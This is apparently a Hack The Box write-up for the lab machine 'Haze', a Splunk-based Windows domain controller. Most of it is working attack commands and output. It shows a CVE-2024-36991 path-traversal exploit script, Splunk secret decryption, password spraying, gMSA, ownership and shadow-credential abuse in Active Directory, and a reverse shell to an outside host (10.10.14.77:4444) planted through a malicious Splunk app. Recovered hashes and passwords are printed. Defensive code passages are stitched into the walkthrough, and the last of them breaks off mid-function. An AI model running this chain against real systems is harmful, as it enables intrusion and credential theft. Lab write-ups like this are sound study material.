Haze
Recon
HTTP (8000)
Ports 80/443 are closed, but 8000 stands out with a Splunk header.

splunkd discloses the version information on port 8089. There are 4 routes, but we don't have access to them without credentials.

Check for vulnerabilities affecting this version: https://advisory.splunk.com/?301=/en_us/product-security.html
CVE-2024-36991 stands out because we are attacking a Windows machine and its severity is High; the other issues may require authentication.

PoC: CVE-2024-36991. TL;DR: it's fucking os.path.join again; why can't people just use pathlib?
The PoC works, but there's an /etc/passwd which contains passwords on Windows???
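The page blames os.path.join for the traversal. The following example, added here and not taken from the page or from Splunk's code, shows the ntpath.join behaviour behind that kind of bug: a drive-relative segment such as C:.. loses its drive prefix when it matches the base drive and is appended as a plain .., so a deny-list that looks for a literal ".." segment never sees it. Beside it is the containment check a handler should use instead: normalise the joined path first, then verify it still lies under the base directory. WEB_ROOT and both handlers are constructed for illustration; ntpath is pure Python, so this runs on any OS.

```python
import ntpath  # Windows path semantics, importable on any OS

# Assumed web root; constructed for this example, not Splunk's real layout.
WEB_ROOT = r"C:\Program Files\Splunk\share\splunk"


def split_request_path(request_path):
    """Split a URL path into segments the way a file-serving handler would."""
    return [seg for seg in request_path.split("/") if seg]


def naive_join(base, request_path):
    """Deny-list check for '..' segments, then ntpath.join.

    A segment like 'C:..' is drive-relative: ntpath.join drops the 'C:' when
    it matches the base drive and appends '..', so the check never fires.
    """
    segments = split_request_path(request_path)
    if any(seg == ".." for seg in segments):
        raise PermissionError("traversal rejected")
    return ntpath.normpath(ntpath.join(base, *segments))


def contained_join(base, request_path):
    """Resolve the candidate path first, then require it to stay under base."""
    segments = split_request_path(request_path)
    base_n = ntpath.normpath(base)
    candidate = ntpath.normpath(ntpath.join(base_n, *segments))
    try:
        common = ntpath.commonpath([base_n, candidate])
    except ValueError:
        # Different drive letters or mixed absolute/relative: never under base.
        raise PermissionError("traversal rejected")
    if common != base_n:
        raise PermissionError("traversal rejected")
    return candidate


def is_contained(base, request_path):
    """Boolean form of contained_join for callers that only need a verdict."""
    try:
        contained_join(base, request_path)
        return True
    except PermissionError:
        return False


if __name__ == "__main__":
    traversal = "C:../C:../C:../C:../C:../etc/passwd"
    print("naive:", naive_join(WEB_ROOT, traversal))
    print("contained:", is_contained(WEB_ROOT, traversal))
    print("legit:", contained_join(WEB_ROOT, "en-US/static/app.js"))
```

Note that the containment check is also more permissive in the right direction: a harmless "en-US/../en-US/static/app.js" resolves inside the root and is accepted, whereas the deny-list would have rejected it.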
└─$ git clone https://github.com/bigb0x/CVE-2024-36991.git -q
└─$ py CVE-2024-36991/CVE-2024-36991.py -u http://haze.htb:8000
[INFO] Log directory created: logs
[INFO] Testing single target: http://haze.htb:8000
[VLUN] Vulnerable: http://haze.htb:8000
:admin:$6$Ak3m7.aHgb/NOQez$O7C8Ck2lg5RaXJs9FrwPr7xbJBJxMCpqIx3TG30Pvl7JSvv0pn3vtYnt8qF4WhL7hBZygwemqn7PBj5dLBm0D1::Administrator:admin:changeme@example.com:::20152
:edward:$6$3LQHFzfmlpMgxY57$Sk32K6eknpAtcT23h6igJRuM1eCe7WAfygm103cQ22/Niwp1pTCKzc0Ok1qhV25UsoUN4t7HYfoGDb4ZCv8pw1::Edward@haze.htb:user:Edward@haze.htb:::20152
:mark:$6$j4QsAJiV8mLg/bhA$Oa/l2cgCXF8Ux7xIaDe3dMW6.Qfobo0PtztrVMHZgdGa1j8423jUvMqYuqjZa/LPd.xryUwe699/8SgNC6v2H/:::user:Mark@haze.htb:::20152
:paul:$6$Y5ds8NjDLd7SzOTW$Zg/WOJxk38KtI.ci9RFl87hhWSawfpT6X.woxTvB4rduL4rDKkE.psK7eXm6TgriABAhqdCPI4P0hcB8xz0cd1:::user:paul@haze.htb:::20152
Make the script more flexible by taking the file to read as an argument.
import sys
from pathlib import Path
from argparse import ArgumentParser
import requests

parser = ArgumentParser()
parser.add_argument('-u', '--url', required=True, help='Target URL (e.g., http://example.com)')
parser.add_argument('-f', '--file', required=True, help='Target file (e.g., /etc/passwd)')
parser.add_argument('-d', '--download', help='Download instead of print', action='store_true')
args = parser.parse_args()

## Relative
payload = "/en-US/modules/messaging/C:../C:../C:../C:../C:..%s" % args.file
## Absolute
# payload = "/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:..%s" % args.file

target = f"{args.url}{payload}"
print(f'Target URL: {target}\n')

resp = requests.get(target)
if '404 Not Found' in resp.text:
    print('File not found')
    sys.exit(1)

if args.download:
    # Save under the requested file's basename in the current directory
    with open(Path(args.file).name, 'w') as f:
        f.write(resp.text)
else:
    print(resp.text)
/etc/hostname doesn't exist, so the passwd file is some decoy or something.
└─$ py lfi.py -u http://haze.htb:8000 -f /etc/hostname
Target URL: http://haze.htb:8000//en-US/modules/messaging/C:../C:../C:../C:../C:../etc/hostname
File not found
└─$ py lfi.py -u http://haze.htb:8000 -f /etc/passwd
Target URL: http://haze.htb:8000//en-US/modules/messaging/C:../C:../C:../C:../C:../etc/passwd
:admin:$6$Ak3m7.aHgb/NOQez$O7C8Ck2lg5RaXJs9FrwPr7xbJBJxMCpqIx3TG30Pvl7JSvv0pn3vtYnt8qF4WhL7hBZygwemqn7PBj5dLBm0D1::Administrator:admin:changeme@example.com:::20152
...
Splunk uses a Linux-like directory structure for storing files, configuration and so on:
https://docs.splunk.com/Documentation/Splunk/latest/Admin/Listofconfigurationfiles
https://docs.splunk.com/Documentation/Splunk/latest/Admin/Wheretofindtheconfigurationfiles
server.conf: Contains a variety of settings for configuring the overall state of a Splunk Enterprise instance
└─$ py lfi.py -u http://haze.htb:8000 -f '/etc/system/default/server.conf'
...default splunk config..
└─$ py lfi.py -u http://haze.htb:8000 -f '/etc/system/local/server.conf'
Target URL: http://haze.htb:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../etc/system/local/server.conf
[general]
serverName = dc01
pass4SymmKey = $7$lPCemQk01ejJvI8nwCjXjx7PJclrQJ+SfC3/ST+K0s+1LsdlNuXwlA==
[sslConfig]
sslPassword = $7$/nq/of9YXJfJY+DzwGMxgOmH4Fc0dgNwc5qfCiBhwdYvg9+0OCCcQw==
[lmpool:auto_generated_pool_download-trial]
description = auto_generated_pool_download-trial
peers = *
quota = MAX
stack_id = download-trial
[lmpool:auto_generated_pool_forwarder]
description = auto_generated_pool_forwarder
peers = *
quota = MAX
stack_id = forwarder
[lmpool:auto_generated_pool_free]
description = auto_generated_pool_free
peers = *
quota = MAX
stack_id = free
authentication.conf: Toggle between Splunk's built-in authentication or LDAP, and configure LDAP.
└─$ py lfi.py -u http://haze.htb:8000 -f '/etc/system/local/authentication.conf'
Target URL: http://haze.htb:8000/en-US/modules/messaging/C:../C:../C:../C:../C:..//etc/system/local/authentication.conf
...
[Haze LDAP Auth]
SSLEnabled = 0
anonymous_referrals = 1
bindDN = CN=Paul Taylor,CN=Users,DC=haze,DC=htb
bindDNpassword = $7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=
charset = utf8
emailAttribute = mail
enableRangeRetrieval = 0
groupBaseDN = CN=Splunk_LDAP_Auth,CN=Users,DC=haze,DC=htb
groupMappingAttribute = dn
groupMemberAttribute = member
groupNameAttribute = cn
host = dc01.haze.htb
nestedGroups = 0
network_timeout = 20
pagelimit = -1
port = 389
realNameAttribute = cn
sizelimit = 1000
timelimit = 15
userBaseDN = CN=Users,DC=haze,DC=htb
userNameAttribute = samaccountname
[authentication]
authSettings = Haze LDAP Auth
authType = LDAP
SplunkSecrets
To decrypt Splunk secrets the splunk command is normally required, but there is always an alternative. The splunk.secret file is required either way (https://community.splunk.com/t5/Knowledge-Management/What-is-the-splunk-secret-file-and-is-it-possible-to-change-it/m-p/331207)
└─$ pip install git+https://github.com/HurricaneLabs/splunksecrets.git
└─$ py lfi.py -u http://haze.htb:8000 -f '/etc/auth/splunk.secret'
Target URL: http://haze.htb:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../etc/auth/splunk.secret
NfKeJCdFGKUQUqyQmnX/WM9xMn5uVF32qyiofYPHkEOGcpMsEN.lRPooJnBdEL5Gh2wm12jKEytQoxsAYA5mReU9.h0SYEwpFMDyyAuTqhnba9P2Kul0dyBizLpq6Nq5qiCTBK3UM516vzArIkZvWQLk3Bqm1YylhEfdUvaw1ngVqR1oRtg54qf4jG0X16hNDhXokoyvgb44lWcH33FrMXxMvzFKd5W3TaAUisO6rnN0xqB7cHbofaA1YV9vgD
└─$ py lfi.py -u http://haze.htb:8000 -f '/etc/auth/splunk.secret' -d
└─$ splunksecrets splunk-decrypt -S splunk.secret # bindDNpassword
Ciphertext: $7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=
Ld@p_Auth_Sp1unk@2k24
└─$ splunksecrets splunk-decrypt -S splunk.secret # pass4SymmKey
Ciphertext: $7$lPCemQk01ejJvI8nwCjXjx7PJclrQJ+SfC3/ST+K0s+1LsdlNuXwlA==
changeme
└─$ splunksecrets splunk-decrypt -S splunk.secret # sslPassword
Ciphertext: $7$/nq/of9YXJfJY+DzwGMxgOmH4Fc0dgNwc5qfCiBhwdYvg9+0OCCcQw==
password
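The config files recovered above and the decryption step that follows them make the same point: a $7$ (or older $1$) value is encrypted, not hashed, and anyone who can read splunk.secret recovers the plaintext, while the LDAP strategy binds with SSLEnabled = 0 and so sends that password over cleartext LDAP on port 389. The following audit, added here as an example and not part of the page or of any Splunk tooling, parses such fragments and flags both conditions. The fragments are constructed to mirror the recovered configuration, with placeholder ciphertexts; the setting names and the load_conf / find_reversible_secrets / find_cleartext_ldap / audit helpers are this example's own.

```python
from configparser import ConfigParser

# Constructed fragments modelled on the server.conf and authentication.conf
# recovered above; the ciphertexts are placeholders, not the host's values.
SERVER_CONF = """\
[general]
serverName = dc01
pass4SymmKey = $7$PLACEHOLDER_CIPHERTEXT_1

[sslConfig]
sslPassword = $7$PLACEHOLDER_CIPHERTEXT_2
"""

AUTH_CONF = """\
[Haze LDAP Auth]
SSLEnabled = 0
bindDN = CN=Paul Taylor,CN=Users,DC=haze,DC=htb
bindDNpassword = $7$PLACEHOLDER_CIPHERTEXT_3
host = dc01.haze.htb
port = 389

[authentication]
authSettings = Haze LDAP Auth
authType = LDAP
"""

# Settings whose values Splunk stores encrypted under splunk.secret.
SECRET_KEYS = {"pass4SymmKey", "sslPassword", "bindDNpassword"}


def load_conf(text):
    """Parse a Splunk .conf fragment; keys stay case-sensitive (pass4SymmKey)."""
    cp = ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str
    cp.read_string(text)
    return cp


def find_reversible_secrets(cp):
    """List (section, key, scheme) for secrets that splunk.secret can decrypt.

    '$1$' is the older scheme and '$7$' the current one; neither is a hash,
    so reading splunk.secret is enough to recover the plaintext.
    """
    found = []
    for section in cp.sections():
        for key, value in cp.items(section):
            if key in SECRET_KEYS and value.startswith(("$1$", "$7$")):
                found.append((section, key, value[:3]))
    return found


def find_cleartext_ldap(cp):
    """List LDAP strategies that bind with SSLEnabled = 0 (password in clear)."""
    findings = []
    for section in cp.sections():
        if not cp.has_option(section, "bindDN"):
            continue
        if cp.get(section, "SSLEnabled", fallback="0").strip() == "0":
            findings.append((section, cp.get(section, "host"), cp.get(section, "port")))
    return findings


def audit(server_text, auth_text):
    """Combine both checks into human-readable findings."""
    lines = []
    for conf_name, text in (("server.conf", server_text), ("authentication.conf", auth_text)):
        for section, key, scheme in find_reversible_secrets(load_conf(text)):
            lines.append(f"{conf_name} [{section}] {key}: {scheme} ciphertext, reversible with splunk.secret")
    for section, host, port in find_cleartext_ldap(load_conf(auth_text)):
        lines.append(f"authentication.conf [{section}]: LDAP bind to {host}:{port} without TLS")
    return lines


if __name__ == "__main__":
    for line in audit(SERVER_CONF, AUTH_CONF):
        print(line)
```

The practical consequence for a defender is that file-read access to the Splunk tree must be treated as disclosure of every $7$ value in it, so after an incident like this the bind account's password, pass4SymmKey and the SSL key password all need rotating, not just splunk.secret.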
Generate possible AD username formats for 'Paul Taylor' and try the recovered password
└─$ namebuster 'Paul Taylor' > usernames.txt
└─$ netexec ldap dc01.haze.htb -u usernames.txt -p 'Ld@p_Auth_Sp1unk@2k24'
LDAP 10.129.31.43 389 DC01 [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
SMB (135)
The SMB shares are empty, but we can enumerate valid users by RID brute-forcing
└─$ netexec smb dc01.haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute | tee rid-brute.log
└─$ grep 'User' rid-brute.log | awk '{print($6)}' | tee users.txt
HAZE\Administrator
HAZE\Guest
HAZE\krbtgt
HAZE\Domain
HAZE\Protected
HAZE\DC01$
HAZE\paul.taylor
HAZE\mark.adams
HAZE\edward.martin
HAZE\alexander.green
HAZE\Haze-IT-Backup$
Check for password reuse
└─$ netexec smb dc01.haze.htb -u users.txt -p 'Ld@p_Auth_Sp1unk@2k24' --continue-on-success
SMB 10.129.31.43 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
...
SMB 10.129.31.43 445 DC01 [+] HAZE\paul.taylor:Ld@p_Auth_Sp1unk@2k24
SMB 10.129.31.43 445 DC01 [+] HAZE\mark.adams:Ld@p_Auth_Sp1unk@2k24
...
Bloodhound
Enumerate with BloodHound.
└─$ bloodhound-python -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb -ns 10.129.31.43 -dc dc01.haze.htb -c all --zip -op paul
...
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
...
└─$ sudo ntpdate haze.htb
CLOCK: time stepped by 28800.753143
└─$ echo $(( 28800.753143 / 3600 ))
8.0002092063888899
└─$ faketime -f +8h bloodhound-python -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb -ns 10.129.31.43 -dc dc01.haze.htb -c all --zip -op paul
INFO: Found AD domain: haze.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.haze.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.haze.htb
INFO: Found 3 users
INFO: Found 32 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 18 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.haze.htb
INFO: Done in 00M 19S
INFO: Compressing output into 20250330174231_bloodhound.zip
└─$ faketime -f +8h bloodhound-python -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb -ns 10.129.31.43 -dc dc01.haze.htb -c all --zip -op mark
INFO: Found AD domain: haze.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.haze.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.haze.htb
INFO: Found 8 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.haze.htb
INFO: Done in 00M 17S
INFO: Compressing output into 20250330174351_bloodhound.zip
Note: There was a Kerberos clock-skew error; fix it with faketime to avoid losing any data.
From BloodHound it seems mark has more permissions than paul.


GMSA (mark.adams)
Reading the gMSA password fails, so something must be preventing us from reading the value
└─$ netexec ldap dc01.haze.htb -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' --gmsa
LDAP 10.129.31.43 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:haze.htb)
LDAPS 10.129.31.43 636 DC01 [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24
LDAPS 10.129.31.43 636 DC01 [*] Getting GMSA Passwords
LDAPS 10.129.31.43 636 DC01 Account: Haze-IT-Backup$ NTLM:
Add-ADPermission fails because the cmdlet doesn't seem to exist
*Evil-WinRM* PS C:\Users\mark.adams\Music> Add-ADPermission -Identity (Get-ADServiceAccount -Identity "Haze-IT-Backup$") -User (Get-ADUser -Identity "mark.adams") -AccessRights GenericRead -Properties msDS-ManagedPassword
Get existing commands for ADServiceAccount manipulation
*Evil-WinRM* PS C:\Users\mark.adams\Music> Get-Command *-ADServiceAccount
CommandType Name Version Source
----------- ---- ------- ------
Cmdlet Get-ADServiceAccount 1.0.1.0 ActiveDirectory
Cmdlet Install-ADServiceAccount 1.0.1.0 ActiveDirectory
Cmdlet New-ADServiceAccount 1.0.1.0 ActiveDirectory
Cmdlet Remove-ADServiceAccount 1.0.1.0 ActiveDirectory
Cmdlet Set-ADServiceAccount 1.0.1.0 ActiveDirectory
Cmdlet Test-ADServiceAccount 1.0.1.0 ActiveDirectory
Cmdlet Uninstall-ADServiceAccount 1.0.1.0 ActiveDirectory
Check whether the value can be read:
*Evil-WinRM* PS C:\Users\mark.adams\Music> Get-ADServiceAccount -Identity 'Haze-IT-Backup' -Property msDS-ManagedPassword
DistinguishedName : CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
Enabled : True
Name : Haze-IT-Backup
ObjectClass : msDS-GroupManagedServiceAccount
ObjectGUID : 66f8d593-2f0b-4a56-95b4-01b326c7a780
SamAccountName : Haze-IT-Backup$
SID : S-1-5-21-323145914-28650650-2368316563-1111
UserPrincipalName :
Grant read permission and check the value again
*Evil-WinRM* PS C:\Users\mark.adams\Music> Set-ADServiceAccount -Identity "Haze-IT-Backup$" -PrincipalsAllowedToRetrieveManagedPassword "mark.adams"
*Evil-WinRM* PS C:\Users\mark.adams\Music> Get-ADServiceAccount -Identity 'Haze-IT-Backup' -Property msDS-ManagedPassword
DistinguishedName : CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
Enabled : True
msDS-ManagedPassword : {1, 0, 0, 0...}
Name : Haze-IT-Backup
ObjectClass : msDS-GroupManagedServiceAccount
ObjectGUID : 66f8d593-2f0b-4a56-95b4-01b326c7a780
SamAccountName : Haze-IT-Backup$
SID : S-1-5-21-323145914-28650650-2368316563-1111
UserPrincipalName :
Now we are able to read the gMSA password for Haze-IT-Backup
└─$ netexec ldap dc01.haze.htb -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' --gmsa
LDAPS 10.129.31.43 636 DC01 Account: Haze-IT-Backup$ NTLM: 735c02c6b2dc54c3c8c6891f55279ebc
HAZE-IT-BACKUP

OPSEC: The computer HAZE-IT-BACKUP$@HAZE.HTB has the ability to modify the owner of the group SUPPORTSERVICES@HAZE.HTB. Object owners retain the ability to modify object security descriptors, regardless of permissions on the object's DACL.
https://www.thehacker.recipes/ad/movement/dacl/grant-ownership
└─$ bloodyAD --host "dc01.haze.htb" -d "haze.htb" -u "Haze-IT-Backup$" -p ":735c02c6b2dc54c3c8c6891f55279ebc" set owner 'Support_Services' 'Haze-IT-Backup$'
[+] Old owner S-1-5-21-323145914-28650650-2368316563-512 is now replaced by Haze-IT-Backup$ on Support_Services
https://www.thehacker.recipes/ad/movement/dacl/grant-rights
└─$ faketime -f +8h bloodyAD --host "dc01.haze.htb" -d "haze.htb" -u "Haze-IT-Backup$" -p ":735c02c6b2dc54c3c8c6891f55279ebc" add groupMember 'Support_Services' 'Haze-IT-Backup$'
[+] Haze-IT-Backup$ added to Support_Services
└─$ bloodyAD --host "dc01.haze.htb" -d "haze.htb" -u "Haze-IT-Backup$" -p ":735c02c6b2dc54c3c8c6891f55279ebc" add genericAll 'Support_Services' 'Haze-IT-Backup$'
[+] Haze-IT-Backup$ has now GenericAll on Support_Services
Note: Not positive why, but genericAll didn't work for mark.adams
Shadow Credentials
Update bloodhound data
└─$ bloodhound-python -u 'Haze-IT-Backup$' --hashes ':735c02c6b2dc54c3c8c6891f55279ebc' -d haze.htb -ns 10.129.31.43 -dc dc01.haze.htb -c all --zip -op it

└─$ faketime -f +8h certipy-ad shadow auto -u 'Haze-IT-Backup$@haze.htb' -hashes ':735c02c6b2dc54c3c8c6891f55279ebc' -account edward.martin -target haze.htb -dc-ip 10.129.31.43
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'edward.martin'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '2b7e5660-91c2-d80c-1d44-03984c7891a0'
[*] Adding Key Credential with device ID '2b7e5660-91c2-d80c-1d44-03984c7891a0' to the Key Credentials for 'edward.martin'
[*] Successfully added Key Credential with device ID '2b7e5660-91c2-d80c-1d44-03984c7891a0' to the Key Credentials for 'edward.martin'
[*] Authenticating as 'edward.martin' with the certificate
[*] Using principal: edward.martin@haze.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'edward.martin.ccache'
[*] Trying to retrieve NT hash for 'edward.martin'
[*] Restoring the old Key Credentials for 'edward.martin'
[*] Successfully restored the old Key Credentials for 'edward.martin'
[*] NT hash for 'edward.martin': 09e0b3eeb2e7a6b0d419e9ff8f4d91af
Can also be done with bloodyAD -> faketime -f +8h bloodyAD --host "dc01.haze.htb" -d "haze.htb" -u "Haze-IT-Backup$" -p ":735c02c6b2dc54c3c8c6891f55279ebc" add shadowCredentials 'edward.martin', but certipy-ad is simpler.
You might want to execute the commands quickly because of HTB's 10-second cleanup rules:
faketime -f +8h bloodyAD --host "dc01.haze.htb" -d "haze.htb" -u "Haze-IT-Backup$" -p ":735c02c6b2dc54c3c8c6891f55279ebc" set owner 'Support_Services' 'Haze-IT-Backup$'
faketime -f +8h bloodyAD --host "dc01.haze.htb" -d "haze.htb" -u "Haze-IT-Backup$" -p ":735c02c6b2dc54c3c8c6891f55279ebc" add groupMember 'Support_Services' 'Haze-IT-Backup$'
faketime -f +8h bloodyAD --host "dc01.haze.htb" -d "haze.htb" -u "Haze-IT-Backup$" -p ":735c02c6b2dc54c3c8c6891f55279ebc" add genericAll 'Support_Services' 'Haze-IT-Backup$'
faketime -f +8h certipy-ad shadow auto -u 'Haze-IT-Backup$@haze.htb' -hashes ':735c02c6b2dc54c3c8c6891f55279ebc' -account edward.martin -target haze.htb -dc-ip 10.129.31.43
WinRM (edward.martin)
└─$ netexec winrm dc01.haze.htb -u 'edward.martin' -H '09e0b3eeb2e7a6b0d419e9ff8f4d91af'
WINRM 10.129.31.43 5985 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:haze.htb)
WINRM 10.129.31.43 5985 DC01 [+] haze.htb\edward.martin:09e0b3eeb2e7a6b0d419e9ff8f4d91af (Pwn3d!)
└─$ evil-winrm -i 'dc01.haze.htb' -u 'edward.martin' -H '09e0b3eeb2e7a6b0d419e9ff8f4d91af'
*Evil-WinRM* PS C:\Users\edward.martin\Documents> whoami /all
User Name SID
================== ===========================================
haze\edward.martin S-1-5-21-323145914-28650650-2368316563-1105
Group Name Type SID Attributes
=========================================== ================ =========================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
HAZE\Backup_Reviewers Group S-1-5-21-323145914-28650650-2368316563-1109 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
User.txt
*Evil-WinRM* PS C:\Users\edward.martin> cat Desktop/user.txt
69a27d7091c0a3a359b607b14a10069d
Privilege Escalation (alexander.green)
The user is part of the HAZE\Backup_Reviewers group and there's a Backups directory in the root of C:.
*Evil-WinRM* PS C:\Backups\Splunk> ls|%{$_.fullname}
C:\Backups\Splunk\splunk_backup_2024-08-06.zip
*Evil-WinRM* PS C:\Backups\Splunk> download C:\Backups\Splunk\splunk_backup_2024-08-06.zip
└─$ 7z x splunk_backup_2024-08-06.zip
└─$ find . -empty -delete
└─$ find . -name *.conf | grep -v default
./var/run/splunk/confsnapshot/baseline_local/users/admin/user-prefs/local/user-prefs.conf
./var/run/splunk/confsnapshot/baseline_local/apps/splunk_instrumentation/local/telemetry.conf
./var/run/splunk/confsnapshot/baseline_local/apps/splunk_httpinput/local/app.conf
./var/run/splunk/confsnapshot/baseline_local/apps/splunk_assist/local/assist.conf
./var/run/splunk/confsnapshot/baseline_local/apps/learned/local/props.conf
./var/run/splunk/confsnapshot/baseline_local/system/local/migration.conf
./var/run/splunk/confsnapshot/baseline_local/system/local/authentication.conf
./var/run/splunk/confsnapshot/baseline_local/system/local/server.conf
./var/run/splunk/merged/web.conf
./var/run/splunk/merged/server.conf
./etc/splunk-launch.conf
./etc/users/admin/user-prefs/local/user-prefs.conf
./etc/modules/distributedDeployment/classes/deployable/inputs.conf
./etc/modules/distributedDeployment/classes/deployable/outputs.conf
./etc/modules/distributedDeployment/classes/deploymentserver/deployment.conf
./etc/openldap/ldap.conf
└─$ cat ./var/run/splunk/confsnapshot/baseline_local/system/local/authentication.conf | grep bind
bindDN = CN=alexander.green,CN=Users,DC=haze,DC=htb
bindDNpassword = $1$YDz8WfhoCWmf6aTRkA+QqUI=
└─$ cat ./etc/auth/splunk.secret
CgL8i4HvEen3cCYOYZDBkuATi5WQuORBw9g4zp4pv5mpMcMF3sWKtaCWTX8Kc1BK3pb9HR13oJqHpvYLUZ.gIJIuYZCA/YNwbbI4fDkbpGD.8yX/8VPVTG22V5G5rDxO5qNzXSQIz3NBtFE6oPhVLAVOJ0EgCYGjuk.fgspXYUc9F24Q6P/QGB/XP8sLZ2h00FQYRmxaSUTAroHHz8fYIsChsea7GBRaolimfQLD7yWGefscTbuXOMJOrzr/6B
└─$ splunksecrets splunk-decrypt -S ./etc/auth/splunk.secret
Ciphertext: $1$YDz8WfhoCWmf6aTRkA+QqUI=
Sp1unkadmin@2k24
The credentials don't work against the domain
└─$ netexec smb dc01.haze.htb -u 'alexander.green' -p 'Sp1unkadmin@2k24'
SMB 10.129.31.43 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
SMB 10.129.31.43 445 DC01 [-] haze.htb\alexander.green:Sp1unkadmin@2k24 STATUS_LOGON_FAILURE
Reverse Shell
We are not able to log in to the machine, but we can log in to Splunk as Administrator with admin:Sp1unkadmin@2k24

Secure Splunk Enterprise service accounts: On Windows, the Local System user is often the best choice to run Splunk Enterprise.
└─$ git clone https://github.com/0xjpuff/reverse_shell_splunk.git -q
└─$ cd reverse_shell_splunk # DONT FORGET
└─$ cp /opt/scripts/shells/ConPtyShell/Invoke-ConPtyShell.ps1 .
└─$ echo 'Invoke-ConPtyShell 10.10.14.77 4444;' >> Invoke-ConPtyShell.ps1
└─$ serve # Http server
└─$ stty raw -echo; (stty size; cat) | nc -lvnp 4444 # Listener

└─$ tar -cvzf letmein.tgz reverse_shell_splunk
└─$ mv letmein.tgz letmein.spl
Apps > Manage Apps

Install app from file

Upload malicious app

Change Sharing to All Apps (system)

After waiting for a minute nothing makes a callback 🤔
I made the mistake of not going inside the directory; the reverse_shell_splunk module is inside the git repository, the git repository is not the module 😓 (Command above updated, so ignore)
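The upload procedure above works because a Splunk app is installed and run by the splunkd service identity (Local System here, per the quoted Splunk guidance), so any scripted input the app declares executes with that identity. For the reviewing side, here is an added example, not code from the page or from the linked repository, that unpacks an .spl package in memory and reports the scripted-input stanzas and bin/ scripts it would run, which is the check an administrator wants before approving an app from file. The sample package, its app name and file contents are constructed for this example; the inputs.conf layout follows Splunk's documented app structure, and build_spl / inspect_spl / needs_review are this example's own helpers.

```python
import io
import tarfile
from configparser import ConfigParser

# Constructed sample package (app name and contents invented for this example).
# Layout follows Splunk's app structure: default/inputs.conf declares a scripted
# input and bin/ holds what it runs.
SAMPLE_FILES = {
    "demo_app/default/app.conf": "[launcher]\nversion = 1.0\n",
    "demo_app/default/inputs.conf": "[script://./bin/run.bat]\ndisabled = 0\ninterval = 10\n",
    "demo_app/bin/run.bat": "@echo off\r\nrem placeholder body\r\n",
    "demo_app/bin/helper.ps1": "# placeholder body\n",
    "demo_app/README": "not executable\n",
}

SCRIPT_SUFFIXES = (".bat", ".cmd", ".ps1", ".py", ".sh", ".exe", ".vbs")


def build_spl(files):
    """Pack a {path: text} mapping into an in-memory .spl (gzip-compressed tar)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, text in files.items():
            data = text.encode()
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def inspect_spl(blob):
    """Return (scripted_inputs, script_files) found in the package.

    scripted_inputs: (stanza, disabled) pairs from default/ or local/ inputs.conf.
    script_files: members under a bin/ directory with an executable extension.
    """
    scripted_inputs, script_files = [], []
    with tarfile.open(fileobj=io.BytesIO(blob), mode="r:gz") as tar:
        for member in tar.getmembers():
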